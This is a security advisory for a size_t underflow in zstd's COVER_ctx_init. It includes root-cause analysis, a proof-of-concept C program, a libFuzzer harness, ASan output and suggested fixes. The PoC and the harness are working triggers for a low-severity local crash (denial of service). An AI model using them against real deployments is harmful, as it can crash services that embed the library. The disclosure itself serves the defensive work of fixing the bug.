size_t underflow in COVER_ctx_init when ZDICT_optimizeTrainFromBuffer_cover invoked with params.d=0 leads to multi-EB malloc

## Summary

`COVER_ctx_init()` in `lib/dictBuilder/cover.c` computes a partial-suffix-array
size as `trainingSamplesSize - MAX(d, sizeof(U64)) + 1` (a `size_t` subtraction)
without first checking that `trainingSamplesSize` is large enough. The function
*does* guard against an undersized corpus, but it guards on `totalSamplesSize`,
while it uses `trainingSamplesSize` (a fraction controlled by `params.splitPoint`)
for the subtraction. With `splitPoint < 1.0` and a small corpus the two
quantities diverge and the subtraction underflows, producing
`(size_t)-2` (= `0xfffffffffffffffe`). The next `malloc` request then becomes
roughly `16 EB`, which ASan rejects as `allocation-size-too-big` and which in
production builds returns `NULL` (followed by a SEGV at the next dereference).

The path is most easily reached from `ZDICT_optimizeTrainFromBuffer_cover`,
because that entry point documents `params.d == 0` (and `params.k == 0`) as
"let optimize pick" and then iterates internally over candidate `d` values.
A library consumer that leaves `d` and `k` zeroed in `ZDICT_cover_params_t`,
which is exactly what the documentation invites, and trains with
`splitPoint < 1.0` triggers the bug as soon as the corpus is small enough.

The `zstd` CLI is *not* affected: `--train-cover` validates and clamps cover
parameters before calling the API.

## Root Cause

`lib/dictBuilder/cover.c`, `COVER_ctx_init()` (function defined at line 628).

The sanity check on the corpus uses `totalSamplesSize`:

```c
// lib/dictBuilder/cover.c:641
  if (totalSamplesSize < MAX(d, sizeof(U64)) ||
      totalSamplesSize >= (size_t)COVER_MAX_SAMPLES_SIZE) {
    ...
    return ERROR(srcSize_wrong);
  }
```

But the subtraction immediately below operates on `trainingSamplesSize`, which
is a fraction (`splitPoint`) of `totalSamplesSize`:

```c
// lib/dictBuilder/cover.c:669-670
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
  ctx->suffix = (U32 *)malloc(ctx->suffixSize * sizeof(U32));
```

When the effective `splitPoint` is below `1.0` (the PoC sets `0.5`; optimize
substitutes `COVER_DEFAULT_SPLITPOINT` only when the caller passes
`splitPoint <= 0.0`) and the corpus is small, `trainingSamplesSize` can fall
below `MAX(d, sizeof(U64)) - 1` even though `totalSamplesSize` passes the
check. The subtraction then wraps to `(size_t)-N` for a small `N`, and
`malloc()` is called with `(size_t)-N * sizeof(U32)`, a request of roughly
16 EB.
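The wraparound can be checked with a few lines of standalone C. The sketch below is a model, not zstd code: `MODEL_MAX`, `model_suffix_size`, `model_alloc_bytes` and `check_poc_arithmetic` are hypothetical names that mirror the two quoted expressions, with `uint64_t` and `uint32_t` standing in for `U64` and `U32`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for the MAX macro used in cover.c. */
#define MODEL_MAX(a, b) ((a) > (b) ? (a) : (b))

/* Mirrors cover.c:669: trainingSamplesSize - MAX(d, sizeof(U64)) + 1,
   evaluated entirely in size_t, so a too-small input wraps around. */
static size_t model_suffix_size(size_t trainingSamplesSize, unsigned d)
{
    return trainingSamplesSize - MODEL_MAX((size_t)d, sizeof(uint64_t)) + 1;
}

/* Mirrors the malloc argument at cover.c:670: suffixSize * sizeof(U32). */
static size_t model_alloc_bytes(size_t suffixSize)
{
    return suffixSize * sizeof(uint32_t);
}

/* Worked example from the PoC: 5 training bytes, candidate d = 6. */
static void check_poc_arithmetic(void)
{
    size_t suffixSize = model_suffix_size(5, 6);
    assert(suffixSize == SIZE_MAX - 1);                    /* (size_t)-2 */
    assert(model_alloc_bytes(suffixSize) == SIZE_MAX - 7); /* (size_t)-8 */
}
```

On a 64-bit target `(size_t)-8` is `0xfffffffffffffff8`, which is the request size ASan reports for the PoC.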

How `params.d == 0` makes this trivial to hit:
`ZDICT_optimizeTrainFromBuffer_cover` (`cover.c:1197`) maps a zero `params.d`
to a search range:

```c
// lib/dictBuilder/cover.c:1206-1207
  const unsigned kMinD = parameters->d == 0 ? 6 : parameters->d;
  const unsigned kMaxD = parameters->d == 0 ? 8 : parameters->d;
```

and then iterates `for (d = kMinD; d <= kMaxD; d += 2)` (line 1254), calling
`COVER_ctx_init(..., d, splitPoint, ...)` (line 1261) for each candidate. There
is no precondition on the corpus size before the loop, so a caller that hands
optimize a tiny sample set — perfectly valid as far as the documented "let
optimize pick" contract is concerned — drives the inner function into the
underflowing branch.
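To see why the "auto" mode does not make the threshold any easier to satisfy, the candidate loop can be modeled in isolation. This is a minimal sketch under the assumption that only the `kMinD`/`kMaxD` mapping and the `d += 2` step quoted above matter; `model_candidate_thresholds` and `MODEL_MAX` are hypothetical names, and `uint64_t` stands in for `U64`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for the MAX macro used in cover.c. */
#define MODEL_MAX(a, b) ((a) > (b) ? (a) : (b))

/* Writes MAX(d, sizeof(U64)) into `out` for each candidate d that the
   optimize loop would try, and returns how many candidates were written.
   `cap` bounds the number of entries stored in `out`. */
static size_t model_candidate_thresholds(unsigned paramsD, size_t *out, size_t cap)
{
    const unsigned kMinD = paramsD == 0 ? 6 : paramsD;
    const unsigned kMaxD = paramsD == 0 ? 8 : paramsD;
    size_t n = 0;
    assert(out != NULL);
    for (unsigned d = kMinD; d <= kMaxD && n < cap; d += 2) {
        out[n++] = MODEL_MAX((size_t)d, sizeof(uint64_t));
    }
    return n;
}
```

With `paramsD == 0` the model yields two candidates (6 and 8), and both produce a threshold of 8 bytes because `sizeof(U64)` dominates. A training set shorter than 7 bytes therefore wraps for every candidate the search tries.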

## PoC

### Trigger file

`crash_input` is a 24-byte blob consumed by the AGF harness. The harness
parses the bytes as `[8-byte header][16 bytes of sample data]`, then derives
`nbSamples` (≥5), per-sample sizes (summing to 16), and the cover parameters
from the header bits. The specific decoded shape that crashes:

- `nbSamples = 10`, ten one-byte samples
- `params.d = 0` (zero-initialized — selects the optimize search)
- `params.k = 0` (likewise)
- `params.splitPoint = 0.5`
- `dictBufferCapacity = 1360`

The header bit pattern leaves `d` and `k` at zero so the harness enters the
`optimize` code path with a very small corpus.

### How to generate

Any input that ends up calling `ZDICT_optimizeTrainFromBuffer_cover` with

- `nbSamples ≥ 5`
- per-sample sizes whose total is at least 8 bytes, so the `totalSamplesSize`
  guard passes, while `COVER_sum(first nbTrainSamples) < 7`, so the
  subtraction wraps (e.g. ten 1-byte samples with `splitPoint = 0.5`)
- zero-initialized `params.d` and `params.k`

will reproduce. Minimal recipe: feed N=10 one-byte samples to optimize with
`d` and `k` zeroed and `splitPoint = 0.5` (see `app_realworld.c` below).
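The conditions above can be turned into a small predicate for triaging candidate inputs. This is a sketch, not zstd code. It assumes the training prefix is the first `(unsigned)(nbSamples * splitPoint)` samples, which the report implies but does not quote. It also ignores the `COVER_MAX_SAMPLES_SIZE` upper bound and any other validation `COVER_ctx_init` may perform. `model_sum` and `model_triggers_underflow` are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for the MAX macro used in cover.c. */
#define MODEL_MAX(a, b) ((a) > (b) ? (a) : (b))

/* Sum of the first n sample sizes (the role COVER_sum plays in the report). */
static size_t model_sum(const size_t *sizes, unsigned n)
{
    size_t total = 0;
    for (unsigned i = 0; i < n; ++i) total += sizes[i];
    return total;
}

/* Returns 1 when the corpus passes the totalSamplesSize guard but the
   suffixSize subtraction would wrap for candidate d, else 0.
   ASSUMPTION: nbTrainSamples = (unsigned)(nbSamples * splitPoint). */
static int model_triggers_underflow(const size_t *sizes, unsigned nbSamples,
                                    double splitPoint, unsigned d)
{
    assert(sizes != NULL);
    assert(splitPoint > 0.0);
    const unsigned nbTrain = splitPoint < 1.0
        ? (unsigned)((double)nbSamples * splitPoint) : nbSamples;
    const size_t total = model_sum(sizes, nbSamples);
    const size_t training = model_sum(sizes, nbTrain);
    const size_t threshold = MODEL_MAX((size_t)d, sizeof(uint64_t));
    /* training - threshold + 1 wraps exactly when training + 1 < threshold. */
    return total >= threshold && training + 1 < threshold;
}
```

For ten 1-byte samples with `splitPoint = 0.5` the predicate reports a hit for both `d = 6` and `d = 8`; with `splitPoint = 1.0` the training set equals the whole corpus and the predicate reports no hit.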

---

## Trigger Method 1: Direct libzstd API

`app_realworld.c` — a minimal libzstd consumer that calls the documented
optimize entry point with zero-initialized parameters and ten one-byte samples
(a realistic edge case: training on very short log lines).

```c
/* app_realworld.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ZDICT_STATIC_LINKING_ONLY
#include <zdict.h>

int main(void)
{
    const size_t N = 10;
    unsigned char samples[N];
    size_t sizes[N];
    for (size_t i = 0; i < N; ++i) {
        samples[i] = (unsigned char)('A' + i);
        sizes[i]   = 1;
    }

    const size_t dictCap = 1360;
    void *dict = malloc(dictCap);
    if (dict == NULL) return 1;  /* out of memory before reaching the bug */

    ZDICT_cover_params_t params;
    memset(&params, 0, sizeof(params));
    /* Documented as "let optimize pick" — but underflows downstream. */
    params.d          = 0;
    params.k          = 0;
    params.steps      = 0;
    params.nbThreads  = 1;
    params.splitPoint = 0.50;
    params.zParams.compressionLevel = 0;

    size_t r = ZDICT_optimizeTrainFromBuffer_cover(
        dict, dictCap, samples, sizes, (unsigned)N, &params);
    fprintf(stderr, "ZDICT_optimizeTrainFromBuffer_cover returned: %zu (isError=%d)\n",
            r, ZDICT_isError(r));
    free(dict);
    return 0;
}
```

**Build:**

```bash
ZSTD_SRC=/path/to/zstd
clang -O1 -g -fsanitize=address \
    -I"$ZSTD_SRC/lib" -I"$ZSTD_SRC/lib/dictBuilder" \
    -DZDICT_STATIC_LINKING_ONLY \
    app_realworld.c "$ZSTD_SRC/lib/libzstd.a" -pthread -o app_realworld
```

**Run:**

```bash
ASAN_OPTIONS=detect_leaks=0 ./app_realworld
```

**Output:**

```
==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8
   exceeds maximum supported size of 0x10000000000
    #0 0x...... in malloc
    #1 0x...... in COVER_ctx_init lib/dictBuilder/cover.c:670:24
    #2 0x...... in ZDICT_optimizeTrainFromBuffer_cover lib/dictBuilder/cover.c:1261
    #3 0x...... in main app_realworld.c:...
SUMMARY: AddressSanitizer: allocation-size-too-big in malloc
```

Without ASan, `malloc()` returns `NULL` and the next access in `COVER_ctx_init`
SEGVs.

---

## Trigger Method 2: Fuzzer (AGF harness)

`simple_compress.c` — the libFuzzer harness used by AGF. It deterministically
parses the input into samples and cover parameters and calls
`ZDICT_optimizeTrainFromBuffer_cover`.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define ZDICT_STATIC_LINKING_ONLY
#include "zdict.h"

#define MIN_DICT_CAPACITY 256U
#define MAX_DICT_CAPACITY 2048U
#define MAX_SAMPLE_BYTES 4096U
#define MAX_NB_SAMPLES 32U
#define HEADER_SIZE 8U

static size_t min_size(size_t a, size_t b) { return a < b ? a : b; }

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    if (size < HEADER_SIZE + 8) return 0;

    size_t sampleBytes = min_size(size - HEADER_SIZE, MAX_SAMPLE_BYTES);
    if (sampleBytes < 8) return 0;
    const uint8_t *samplesBuffer = data + HEADER_SIZE;

    unsigned nbSamples = 5U + (unsigned)(data[0] % (MAX_NB_SAMPLES - 4U));
    if ((size_t)nbSamples > sampleBytes) nbSamples = (unsigned)sampleBytes;
    if (nbSamples < 5U) return 0;

    size_t dictBufferCapacity = MIN_DICT_CAPACITY
        + ((size_t)data[1] | ((size_t)data[2] << 8))
          % (MAX_DICT_CAPACITY - MIN_DICT_CAPACITY + 1U);

    void *dictBuffer = malloc(dictBufferCapacity);
    size_t *samplesSizes = (size_t *)malloc((size_t)nbSamples * sizeof(samplesSizes[0]));
    if (!dictBuffer || !samplesSizes) { free(dictBuffer); free(samplesSizes); return 0; }

    /* Build nbSamples non-empty samples whose sizes sum to sampleBytes. */
    size_t remaining = sampleBytes - nbSamples;
    for (unsigned i = 0; i + 1U < nbSamples; ++i) {
        size_t add = remaining
            ? (size_t)data[HEADER_SIZE + (i % sampleBytes)] % (remaining + 1U)
            : 0;
        samplesSizes[i] = 1U + add;
        remaining -= add;
    }
    samplesSizes[nbSamples - 1U] = 1U + remaining;

    ZDICT_cover_params_t params;
    memset(&params, 0, sizeof(params));
    if ((data[3] & 1U) == 0)
        params.d = 6U + 2U * (unsigned)((data[4] >> 4) % 3U);   /* otherwise 0 */
    if ((data[3] & 2U) == 0) {
        unsigned minK = params.d == 0 ? 8U : params.d;
        unsigned range = (unsigned)(dictBufferCapacity - minK + 1U);
        params.k = minK + (unsigned)(data[4] % range);
    }
    if ((data[3] & 4U) == 0) params.steps = 1U + (unsigned)(data[5] % 4U);
    params.nbThreads = 1U;
    if ((data[3] & 8U) != 0 && nbSamples >= 10U)
        params.splitPoint = 0.50 + ((double)(data[6] % 51U) / 100.0);
    else if ((data[3] & 16U) != 0)
        params.splitPoint = 1.0;
    params.zParams.compressionLevel = (int)(data[7] % 10U);

    (void)ZDICT_optimizeTrainFromBuffer_cover(dictBuffer, dictBufferCapacity,
                                              samplesBuffer, samplesSizes,
                                              nbSamples, &params);
    free(samplesSizes);
    free(dictBuffer);
    return 0;
}
```

**Build:**

```bash
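# Build as C with clang: clang++ would compile simple_compress.c as C++ and
# mangle LLVMFuzzerTestOneInput, so libFuzzer could not find the entry point.
ZSTD_SRC=/path/to/zstd
clang -fsanitize=fuzzer,address -g -O1 \
    -I"$ZSTD_SRC/lib" -I"$ZSTD_SRC/lib/dictBuilder" \
    -DZDICT_STATIC_LINKING_ONLY \
    simple_compress.c "$ZSTD_SRC/lib/libzstd.a" -pthread -o cover_fuzzer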
```

**Run on crash_input:**

```bash
ASAN_OPTIONS=detect_leaks=0 ./cover_fuzzer crash_input
```

Same `allocation-size-too-big` at `lib/dictBuilder/cover.c:670` in
`COVER_ctx_init`.

---

## Impact

| Aspect | Details |
|---|---|
| **Type** | Denial of Service (~16 EB malloc; abort under ASan, `NULL`-deref / SEGV otherwise) |
| **Severity** | Low |
| **Attack Vector** | Local; library consumer asks for dictionary optimization via the documented "auto" mode (`params.d == 0` / `params.k == 0`) on a small corpus |
| **Affected Components** | `libzstd` dictBuilder (`lib/dictBuilder/cover.c`, `ZDICT_optimizeTrainFromBuffer_cover` → `COVER_ctx_init`). **Not** the `zstd` CLI — `--train-cover` validates parameters before the API call |
| **Reachability** | Programmatic only: applications that pass zero-initialized `ZDICT_cover_params_t` (or any small `d` paired with a small corpus and `splitPoint < 1.0`) into the optimize entry point |
| **CWE** | CWE-190 (Integer Overflow/Underflow) and CWE-789 (Memory Allocation with Excessive Size Value) |

---

## Suggested Fix

The cleanest local fix is in `COVER_ctx_init` itself: gate the subtraction on
the same quantity that participates in it. In `lib/dictBuilder/cover.c` around
line 641, change the precondition from `totalSamplesSize` to
`trainingSamplesSize` (or add a second check), so the function bails out with
`ERROR(srcSize_wrong)` instead of underflowing at line 669:

```c
/* lib/dictBuilder/cover.c, COVER_ctx_init */
  if (trainingSamplesSize < MAX(d, sizeof(U64)) ||
      totalSamplesSize    < MAX(d, sizeof(U64)) ||
      totalSamplesSize    >= (size_t)COVER_MAX_SAMPLES_SIZE) {
    DISPLAYLEVEL(1, "Total samples size is too small/large (...)");
    return ERROR(srcSize_wrong);
  }
  ...
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
```

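Alternatively, check `trainingSamplesSize` on its own immediately before the
subtraction. This variant is slightly stricter, because it also rejects
`trainingSamplesSize == MAX(d, sizeof(U64))`: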

```c
  if (trainingSamplesSize < MAX(d, sizeof(U64)) + 1)
    return ERROR(srcSize_wrong);
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
```
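The guard can also be exercised in isolation. The helper below is a hypothetical, standalone rendering of the first variant (reject when the training size is below `MAX(d, sizeof(U64))`). `checked_suffix_size` and `MODEL_MAX` are illustrative names, not zstd symbols, and the `-1` return stands in for `ERROR(srcSize_wrong)`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Local stand-in for the MAX macro used in cover.c. */
#define MODEL_MAX(a, b) ((a) > (b) ? (a) : (b))

/* Computes trainingSamplesSize - MAX(d, sizeof(U64)) + 1 without wrapping.
   Returns 0 and stores the result in *suffixSize on success; returns -1
   when trainingSamplesSize is smaller than MAX(d, sizeof(U64)). */
static int checked_suffix_size(size_t trainingSamplesSize, unsigned d,
                               size_t *suffixSize)
{
    const size_t minSize = MODEL_MAX((size_t)d, sizeof(uint64_t));
    assert(suffixSize != NULL);
    if (trainingSamplesSize < minSize) return -1;
    /* Safe: trainingSamplesSize >= minSize, so the difference is >= 0. */
    *suffixSize = trainingSamplesSize - minSize + 1;
    return 0;
}
```

With the PoC values (`trainingSamplesSize = 5`, `d = 6`) the helper returns `-1` instead of producing a wrapped size, and the smallest accepted input (8 bytes) yields a suffix size of 1.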

A complementary hardening at the API boundary, in
`ZDICT_optimizeTrainFromBuffer_cover` (`cover.c:1197`), would be to require
that the training portion of the corpus (the `COVER_sum` of the first
`nbTrainSamples` sizes, roughly `COVER_sum(samplesSizes, nbSamples) *
splitPoint`) is at least `MAX(kMaxD, sizeof(U64))` before entering the
`for (d = kMinD; d <= kMaxD; d += 2)` loop, so the "auto" mode is rejected up
front when the corpus is too small to support the largest candidate `d`.

Both changes are small and local; either alone closes the underflow on the
optimize path.

---

## Credit

Aisle Research (Ze Sheng, Dmitrijs Trizna, Luigino Camastra, Guido Vranken)

